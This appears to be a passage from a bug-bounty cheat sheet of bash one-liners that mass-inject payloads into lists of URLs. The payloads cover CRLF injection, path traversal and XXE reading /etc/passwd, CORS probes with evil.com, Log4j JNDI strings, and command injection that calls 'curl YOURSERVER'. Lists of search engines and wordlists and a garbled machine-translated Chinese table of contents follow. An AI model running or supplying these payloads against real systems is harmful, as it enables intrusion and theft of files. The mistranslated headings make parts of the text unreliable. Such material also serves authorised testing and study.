cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

复制代码

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

CRLF Injection

复制代码

cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt

Cache Poisoning Detection

复制代码

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection

复制代码

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

Race Condition URLs

复制代码

cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpoints

复制代码

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

Path Traversal

复制代码

cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Detection

复制代码

cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

Log4j Scan

复制代码

cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

复制代码

cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

Mass Screenshot

复制代码

cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technology Detection

复制代码

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

Favicon Hash (Shodan)

复制代码

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Exposed Admin Panels

复制代码

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

Debug Endpoints

复制代码

cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators

复制代码

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

WordPress Enumeration

复制代码

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode

复制代码

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

Django Debug

复制代码

cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling

复制代码

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

CSP Bypass Check

复制代码

cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomain from Favicon

复制代码

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

🔍 黑客搜索引擎

Engine	Link	Description
Shodan	shodan.io	IoT & device search
Censys	censys.io	Internet scan data
Fofa	fofa.info	Cyberspace search
ZoomEye	zoomeye.org	Cyberspace mapping
Hunter	hunter.how	Asset discovery
Netlas	netlas.io	Attack surface
GreyNoise	greynoise.io	Internet scanners
Onyphe	onyphe.io	Cyber defense
CriminalIP	criminalip.io	Threat intel
FullHunt	fullhunt.io	Attack surface
Quake	quake.360.net	Cyberspace search
Leakix	leakix.net	Leak detection
URLScan	urlscan.io	URL analysis
DNSDumpster	dnsdumpster.com	DNS recon
crt.sh	crt.sh	Certificate search
SecurityTrails	securitytrails.com	DNS history
Pulsedive	pulsedive.com	Threat intel
VirusTotal	virustotal.com	File/URL analysis
PublicWWW	publicwww.com	Source code search
Grep.app	grep.app	GitHub code search

📖 推荐词表

Wordlist	Link	Use Case
SecLists	GitHub	Everything
FuzzDB	GitHub	Fuzzing
Assetnote	wordlists.assetnote.io	Web content
OneListForAll	GitHub	Combined
jhaddix all.txt	GitHub	Directories
commonspeak2	GitHub	Real-world

📚 学习资源著作

网页应用黑客手册
彼得·雅沃斯基的《真实世界的虫子狩猎》
Vickie Li 的《虫子赏金训练营》

从小白入门到专家入狱——400+ 精选实战渗透路径

目录

🎯 关于

🚀 快速入门

🛠️ 所需工具

核心工具

快速安装脚本

🎯 BBRF范围

💀 子域枚举 ☠️

💀 多源发现（一体化）

💀 证书透明日志

💀 Shodan + Nuclei 管道

💀 ASN 发现与反向 DNS

💀 DNS 暴力破解与 Shuffledns

💀 递归子域 Enum

💀 被动DNS------多源

💀 GitHub子域名抓取

💀 Censys子域发现

💀 SecurityTrails API

💀 网络档案子域名

💀 共同爬行提取

💀 VirusTotal 子域

💀 DNS区域传输尝试

💀 反向IP查找

💀 BGP/ASN距离扫描仪

💀 来自IP范围的PTR记录

💀 全能超级一语连珠

💀 子域置换/暴力破解

💀 DNS 单词列表 Bruteforce with PureDNS

💀 TLS/SSL 证书抓取器

💀 Favicon Hash - > Shodan

💀 谷歌Dork子域名发现

📜 JavaScript Recon

完整的JS流水线

从 JS 提取秘密

JS 文件上的 LinkFinder

SecretFinder 大规模扫描

JS变量提取

来自 JS 的 API 密钥

从JS中提取所有URL。

在 JS 中查找 API 端点

提取硬编码凭证

💀 从 JS 文件中提取 AWS 密钥

💀 在JavaScript中查找S3桶

💀 提取 Google API 密钥

💀 在JS中查找Firebase的URL。

💀 从 JS 中提取 GraphQL 端点

💀 在 JS 中查找内部 IP 和主机名

💀 从 JS 文件中提取 JWT 令牌

💀 查找Webpack源代码地图

💀 从 JS 中提取 Slack/Discord Webhook

💀 在 JavaScript 中查找隐藏的管理员路由

💉 XSS检测

达尔福克斯管道

带回调的盲目XSS

Airixss 快速扫描

Knoxss API

DOM XSS检测

带核DAST的质量XSS

反射参数检测

XSS 多语种测试

🗄️ SQL 注入

SQLMap质扫描

基于错误的检测

基于时间盲

加乌里扫描

联合探测

基于布尔的检测

NoSQL 注入

🌐 SSRF与SSTI

SSRF与Interactsh合作

SSRF 参数模糊

SSTI检测

SSTI有效载荷测试

完整的SSRF链

SSRF 与 DNS 重绑定

Jinja2 SSTI

🕷️ 网络爬虫

武士刀深潜

Gospider全爬